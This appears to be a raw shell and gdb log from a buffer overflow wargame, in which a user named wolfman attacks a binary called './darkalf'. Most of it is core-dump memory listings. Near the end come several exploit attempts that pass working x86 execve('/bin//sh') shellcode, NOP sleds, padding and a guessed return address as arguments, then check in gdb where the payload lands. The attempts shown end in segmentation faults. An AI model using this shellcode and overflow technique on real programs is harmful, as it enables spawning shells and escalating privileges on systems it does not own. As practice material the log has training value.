0xbffffc6c:	0x00	0x00	0x00	0x00
(gdb) 
0xbffffc70:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffc78:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffc80:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffc88:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffc90:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffc98:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffca0:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffca8:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffcb0:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffcb8:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffcc0:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffcc8:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffcd0:	0x00	0x00	0x00	0x00
(gdb) 
0xbffffcd4:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffcdc:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffce4:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffcec:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffcf4:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffcfc:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffd04:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffd0c:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffd14:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffd1c:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffd24:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffd2c:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffd34:	0x00	0x00	0x00	0x00
(gdb) 
0xbffffd38:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffd40:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffd48:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffd50:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffd58:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffd60:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffd68:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffd70:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffd78:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffd80:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffd88:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffd90:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffd98:	0x00	0x00	0x00	0x00
(gdb) 
0xbffffd9c:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffda4:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffdac:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffdb4:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffdbc:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffdc4:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffdcc:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffdd4:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffddc:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffde4:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffdec:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffdf4:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffdfc:	0x00	0x00	0x00	0x00
(gdb) 
0xbffffe00:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffe08:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffe10:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffe18:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffe20:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffe28:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffe30:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffe38:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffe40:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffe48:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffe50:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffe58:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffe60:	0x00	0x00	0x00	0x00
(gdb) 
0xbffffe64:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffe6c:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffe74:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffe7c:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffe84:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffe8c:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffe94:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffe9c:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffea4:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffeac:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffeb4:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffebc:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffec4:	0x00	0x00	0x00	0x00
(gdb) 
0xbffffec8:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffed0:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffed8:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffee0:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffee8:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffef0:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffef8:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbfffff00:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbfffff08:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbfffff10:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbfffff18:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbfffff20:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbfffff28:	0x00	0x00	0x00	0x00
(gdb) 
0xbfffff2c:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbfffff34:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbfffff3c:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbfffff44:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbfffff4c:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbfffff54:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbfffff5c:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbfffff64:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbfffff6c:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbfffff74:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbfffff7c:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbfffff84:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbfffff8c:	0x00	0x00	0x00	0x00
(gdb) 
0xbfffff90:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbfffff98:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbfffffa0:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbfffffa8:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbfffffb0:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbfffffb8:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbfffffc0:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbfffffc8:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbfffffd0:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbfffffd8:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbfffffe0:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbfffffe8:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffff0:	0x00	0x00	0x2e	0x2f
(gdb) 
0xbffffff4:	0x64	0x61	0x72	0x6b	0x61	0x6c	0x66	0x00
0xbffffffc:	0x00	0x00	0x00	0x00	Cannot access memory at address 0xc0000000
(gdb) 
0xc0000001:	Cannot access memory at address 0xc0000001
(gdb) 
0xc0000002:	Cannot access memory at address 0xc0000002
(gdb) x/100b $esp-100
0xbffffa7c:	0x20	0xd9	0x05	0x40	0xe0	0x43	0x01	0x40
0xbffffa84:	0x9c	0xfa	0xff	0xbf	0x70	0x60	0x06	0x40
0xbffffa8c:	0x80	0x69	0x10	0x40	0x60	0xae	0x00	0x40
0xbffffa94:	0x24	0xfb	0xff	0xbf	0xd8	0xfa	0xff	0xbf
0xbffffa9c:	0x13	0x86	0x04	0x08	0xb0	0xfa	0xff	0xbf
0xbffffaa4:	0x00	0x00	0x00	0x00	0x28	0x00	0x00	0x00
0xbffffaac:	0x17	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffab4:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffabc:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffac4:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffacc:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffad4:	0x00	0x00	0x00	0x00	0x41	0x41	0x41	0x41
0xbffffadc:	0xbf	0xbf	0xbf	0xbf
(gdb) x/100 $esp-100
0xbffffa7c:	0x20	0xd9	0x05	0x40	0xe0	0x43	0x01	0x40
0xbffffa84:	0x9c	0xfa	0xff	0xbf	0x70	0x60	0x06	0x40
0xbffffa8c:	0x80	0x69	0x10	0x40	0x60	0xae	0x00	0x40
0xbffffa94:	0x24	0xfb	0xff	0xbf	0xd8	0xfa	0xff	0xbf
0xbffffa9c:	0x13	0x86	0x04	0x08	0xb0	0xfa	0xff	0xbf
0xbffffaa4:	0x00	0x00	0x00	0x00	0x28	0x00	0x00	0x00
0xbffffaac:	0x17	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffab4:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffabc:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffac4:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffacc:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffad4:	0x00	0x00	0x00	0x00	0x41	0x41	0x41	0x41
0xbffffadc:	0xbf	0xbf	0xbf	0xbf
(gdb) x/100x $esp-100
0xbffffa7c:	0x20	0xd9	0x05	0x40	0xe0	0x43	0x01	0x40
0xbffffa84:	0x9c	0xfa	0xff	0xbf	0x70	0x60	0x06	0x40
0xbffffa8c:	0x80	0x69	0x10	0x40	0x60	0xae	0x00	0x40
0xbffffa94:	0x24	0xfb	0xff	0xbf	0xd8	0xfa	0xff	0xbf
0xbffffa9c:	0x13	0x86	0x04	0x08	0xb0	0xfa	0xff	0xbf
0xbffffaa4:	0x00	0x00	0x00	0x00	0x28	0x00	0x00	0x00
0xbffffaac:	0x17	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffab4:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffabc:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffac4:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffacc:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffad4:	0x00	0x00	0x00	0x00	0x41	0x41	0x41	0x41
0xbffffadc:	0xbf	0xbf	0xbf	0xbf
(gdb) x/100x $esp-100
0xbffffa7c:	0x20	0xd9	0x05	0x40	0xe0	0x43	0x01	0x40
0xbffffa84:	0x9c	0xfa	0xff	0xbf	0x70	0x60	0x06	0x40
0xbffffa8c:	0x80	0x69	0x10	0x40	0x60	0xae	0x00	0x40
0xbffffa94:	0x24	0xfb	0xff	0xbf	0xd8	0xfa	0xff	0xbf
0xbffffa9c:	0x13	0x86	0x04	0x08	0xb0	0xfa	0xff	0xbf
0xbffffaa4:	0x00	0x00	0x00	0x00	0x28	0x00	0x00	0x00
0xbffffaac:	0x17	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffab4:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffabc:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffac4:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffacc:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffad4:	0x00	0x00	0x00	0x00	0x41	0x41	0x41	0x41
0xbffffadc:	0xbf	0xbf	0xbf	0xbf
(gdb) exit
Undefined command: "exit".  Try "help".
(gdb) quit
[wolfman@localhost wolfman]$ gdb -c core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `./darkalf AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿'.
Program terminated with signal 11, Segmentation fault.
#0  0xbfbfbfbf in ?? ()
(gdb) x/100x 4esp
Invalid number "4esp".
(gdb) x/100x $esp
0xbffffae0:	0x00000000	0xbffffb24	0xbffffb30	0x40013868
0xbffffaf0:	0x00000002	0x08048450	0x00000000	0x08048471
0xbffffb00:	0x08048500	0x00000002	0xbffffb24	0x08048390
0xbffffb10:	0x0804864c	0x4000ae60	0xbffffb1c	0x40013e90
0xbffffb20:	0x00000002	0xbffffc1c	0xbffffc26	0x00000000
0xbffffb30:	0xbffffc57	0xbffffc69	0xbffffc81	0xbffffca0
0xbffffb40:	0xbffffcc2	0xbffffccf	0xbffffe92	0xbffffeb1
0xbffffb50:	0xbffffece	0xbffffee3	0xbfffff02	0xbfffff0d
0xbffffb60:	0xbfffff26	0xbfffff36	0xbfffff3e	0xbfffff48
0xbffffb70:	0xbfffff58	0xbfffff66	0xbfffff74	0xbfffff85
0xbffffb80:	0xbfffff90	0xbfffffa3	0xbfffffe6	0x00000000
0xbffffb90:	0x00000003	0x08048034	0x00000004	0x00000020
0xbffffba0:	0x00000005	0x00000006	0x00000006	0x00001000
0xbffffbb0:	0x00000007	0x40000000	0x00000008	0x00000000
0xbffffbc0:	0x00000009	0x08048450	0x0000000b	0x000001f9
0xbffffbd0:	0x0000000c	0x000001f9	0x0000000d	0x000001f9
0xbffffbe0:	0x0000000e	0x000001f9	0x00000010	0x0fabfbff
0xbffffbf0:	0x0000000f	0xbffffc17	0x00000000	0x00000000
0xbffffc00:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc10:	0x00000000	0x69000000	0x00363836	0x61642f2e
0xbffffc20:	0x6c616b72	0x41410066	0x41414141	0x41414141
0xbffffc30:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc40:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc50:	0xbfbf4141	0x0000bfbf	0x00000000	0x00000000
0xbffffc60:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) x/100x $esp-100
0xbffffa7c:	0x4005d920	0x400143e0	0xbffffa9c	0x40066070
0xbffffa8c:	0x40106980	0x4000ae60	0xbffffb24	0xbffffad8
0xbffffa9c:	0x08048613	0xbffffab0	0x00000000	0x00000028
0xbffffaac:	0x00000017	0x00000000	0x00000000	0x00000000
0xbffffabc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffacc:	0x00000000	0x00000000	0x00000000	0x41414141
0xbffffadc:	0xbfbfbfbf	0x00000000	0xbffffb24	0xbffffb30
0xbffffaec:	0x40013868	0x00000002	0x08048450	0x00000000
0xbffffafc:	0x08048471	0x08048500	0x00000002	0xbffffb24
0xbffffb0c:	0x08048390	0x0804864c	0x4000ae60	0xbffffb1c
0xbffffb1c:	0x40013e90	0x00000002	0xbffffc1c	0xbffffc26
0xbffffb2c:	0x00000000	0xbffffc57	0xbffffc69	0xbffffc81
0xbffffb3c:	0xbffffca0	0xbffffcc2	0xbffffccf	0xbffffe92
0xbffffb4c:	0xbffffeb1	0xbffffece	0xbffffee3	0xbfffff02
0xbffffb5c:	0xbfffff0d	0xbfffff26	0xbfffff36	0xbfffff3e
0xbffffb6c:	0xbfffff48	0xbfffff58	0xbfffff66	0xbfffff74
0xbffffb7c:	0xbfffff85	0xbfffff90	0xbfffffa3	0xbfffffe6
0xbffffb8c:	0x00000000	0x00000003	0x08048034	0x00000004
0xbffffb9c:	0x00000020	0x00000005	0x00000006	0x00000006
0xbffffbac:	0x00001000	0x00000007	0x40000000	0x00000008
0xbffffbbc:	0x00000000	0x00000009	0x08048450	0x0000000b
0xbffffbcc:	0x000001f9	0x0000000c	0x000001f9	0x0000000d
0xbffffbdc:	0x000001f9	0x0000000e	0x000001f9	0x00000010
0xbffffbec:	0x0fabfbff	0x0000000f	0xbffffc17	0x00000000
0xbffffbfc:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) 
0xbffffc0c:	0x00000000	0x00000000	0x69000000	0x00363836
0xbffffc1c:	0x61642f2e	0x6c616b72	0x41410066	0x41414141
0xbffffc2c:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc3c:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc4c:	0x41414141	0xbfbf4141	0x0000bfbf	0x00000000
0xbffffc5c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc6c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc7c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc8c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc9c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcac:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcbc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffccc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcdc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcec:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcfc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd0c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd1c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd2c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd3c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd4c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd5c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd6c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd7c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd8c:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) q
[wolfman@localhost wolfman]$ ./darkalf `python -c 'print"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xbf\xbf\xbf\xbf"+"\x00"+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
stack is still your friend.
[wolfman@localhost wolfman]$ ./darkalf `python -c 'print"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"A"19+"\xbf\xbf\xbf\xbf"+"\x00"+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
  File "<string>", line 1
    print"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"A"19+"\xbf\xbf\xbf\xbf"+"\x00"+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"
                                                                                                                    ^
SyntaxError: invalid syntax
argv error
[wolfman@localhost wolfman]$ ./darkalf `python -c 'print"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"A"19+"\xbf\xbf\xbf\xbf"+"\x00"'`
  File "<string>", line 1
    print"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"A"19+"\xbf\xbf\xbf\xbf"+"\x00"
                                                                                                                    ^
SyntaxError: invalid syntax
argv error
[wolfman@localhost wolfman]$ ./darkalf `python -c 'print"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"A"*19+"\xbf\xbf\xbf\xbf"+"\x00"'`
1￐h//shh/bin⏓ኂ°
               ̀AAAAAAAAAAAAAAAAAAA¿¿¿¿
Segmentation fault (core dumped)
[wolfman@localhost wolfman]$ ./darkalf `python -c 'print"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"A"*19+"\xbf\xbf\xbf\xbf"'`
1￐h//shh/bin⏓ኂ°
               ̀AAAAAAAAAAAAAAAAAAA¿¿¿¿
Segmentation fault (core dumped)
[wolfman@localhost wolfman]$ gdb -c core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `./darkalf 1￐h//shh/bin⏓ኂ°
                                                ̀AAAAAAAAAAAAAAAAAAA¿¿¿¿'.
Program terminated with signal 11, Segmentation fault.
#0  0xbfbfbfbf in ?? ()
(gdb) x/64 $esp
0xbffffae0:	0x00000000	0xbffffb24	0xbffffb30	0x40013868
0xbffffaf0:	0x00000002	0x08048450	0x00000000	0x08048471
0xbffffb00:	0x08048500	0x00000002	0xbffffb24	0x08048390
0xbffffb10:	0x0804864c	0x4000ae60	0xbffffb1c	0x40013e90
0xbffffb20:	0x00000002	0xbffffc1c	0xbffffc26	0x00000000
0xbffffb30:	0xbffffc57	0xbffffc69	0xbffffc81	0xbffffca0
0xbffffb40:	0xbffffcc2	0xbffffccf	0xbffffe92	0xbffffeb1
0xbffffb50:	0xbffffece	0xbffffee3	0xbfffff02	0xbfffff0d
0xbffffb60:	0xbfffff26	0xbfffff36	0xbfffff3e	0xbfffff48
0xbffffb70:	0xbfffff58	0xbfffff66	0xbfffff74	0xbfffff85
0xbffffb80:	0xbfffff90	0xbfffffa3	0xbfffffe6	0x00000000
0xbffffb90:	0x00000003	0x08048034	0x00000004	0x00000020
0xbffffba0:	0x00000005	0x00000006	0x00000006	0x00001000
0xbffffbb0:	0x00000007	0x40000000	0x00000008	0x00000000
0xbffffbc0:	0x00000009	0x08048450	0x0000000b	0x000001f9
0xbffffbd0:	0x0000000c	0x000001f9	0x0000000d	0x000001f9
(gdb) 
0xbffffbe0:	0x0000000e	0x000001f9	0x00000010	0x0fabfbff
0xbffffbf0:	0x0000000f	0xbffffc17	0x00000000	0x00000000
0xbffffc00:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc10:	0x00000000	0x69000000	0x00363836	0x61642f2e
0xbffffc20:	0x6c616b72	0xc0310066	0x2f2f6850	0x2f686873
0xbffffc30:	0x896e6962	0x895350e3	0xb0c289e1	0x4180cd0b
0xbffffc40:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc50:	0xbfbf4141	0x0000bfbf	0x00000000	0x00000000
0xbffffc60:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc70:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc80:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc90:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffca0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcb0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcc0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcd0:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) x/64 $espq
Value can't be converted to integer.
(gdb) q
[wolfman@localhost wolfman]$ ./darkalf `python -c 'print"\x90"*19+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xbf\xbf\xbf\xbf"'`
1￐h//shh/bin⏓ኂ°
               ̀¿¿¿¿
Segmentation fault (core dumped)
[wolfman@localhost wolfman]$ gdb -c core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `./darkalf 1￐h//shh/bin⏓ኂ°
                                                ̀¿¿¿¿'.
Program terminated with signal 11, Segmentation fault.
#0  0xbfbfbfbf in ?? ()
(gdb) x/64 $esp
0xbffffae0:	0x00000000	0xbffffb24	0xbffffb30	0x40013868
0xbffffaf0:	0x00000002	0x08048450	0x00000000	0x08048471
0xbffffb00:	0x08048500	0x00000002	0xbffffb24	0x08048390
0xbffffb10:	0x0804864c	0x4000ae60	0xbffffb1c	0x40013e90
0xbffffb20:	0x00000002	0xbffffc1c	0xbffffc26	0x00000000
0xbffffb30:	0xbffffc57	0xbffffc69	0xbffffc81	0xbffffca0
0xbffffb40:	0xbffffcc2	0xbffffccf	0xbffffe92	0xbffffeb1
0xbffffb50:	0xbffffece	0xbffffee3	0xbfffff02	0xbfffff0d
0xbffffb60:	0xbfffff26	0xbfffff36	0xbfffff3e	0xbfffff48
0xbffffb70:	0xbfffff58	0xbfffff66	0xbfffff74	0xbfffff85
0xbffffb80:	0xbfffff90	0xbfffffa3	0xbfffffe6	0x00000000
0xbffffb90:	0x00000003	0x08048034	0x00000004	0x00000020
0xbffffba0:	0x00000005	0x00000006	0x00000006	0x00001000
0xbffffbb0:	0x00000007	0x40000000	0x00000008	0x00000000
0xbffffbc0:	0x00000009	0x08048450	0x0000000b	0x000001f9
0xbffffbd0:	0x0000000c	0x000001f9	0x0000000d	0x000001f9
(gdb) 
0xbffffbe0:	0x0000000e	0x000001f9	0x00000010	0x0fabfbff
0xbffffbf0:	0x0000000f	0xbffffc17	0x00000000	0x00000000
0xbffffc00:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc10:	0x00000000	0x69000000	0x00363836	0x61642f2e
0xbffffc20:	0x6c616b72	0x90900066	0x90909090	0x90909090
0xbffffc30:	0x90909090	0x90909090	0x50c03190	0x732f2f68
0xbffffc40:	0x622f6868	0xe3896e69	0xe1895350	0x0bb0c289
0xbffffc50:	0xbfbf80cd	0x0000bfbf	0x00000000	0x00000000
0xbffffc60:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc70:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc80:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc90:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffca0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcb0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcc0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcd0:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) q
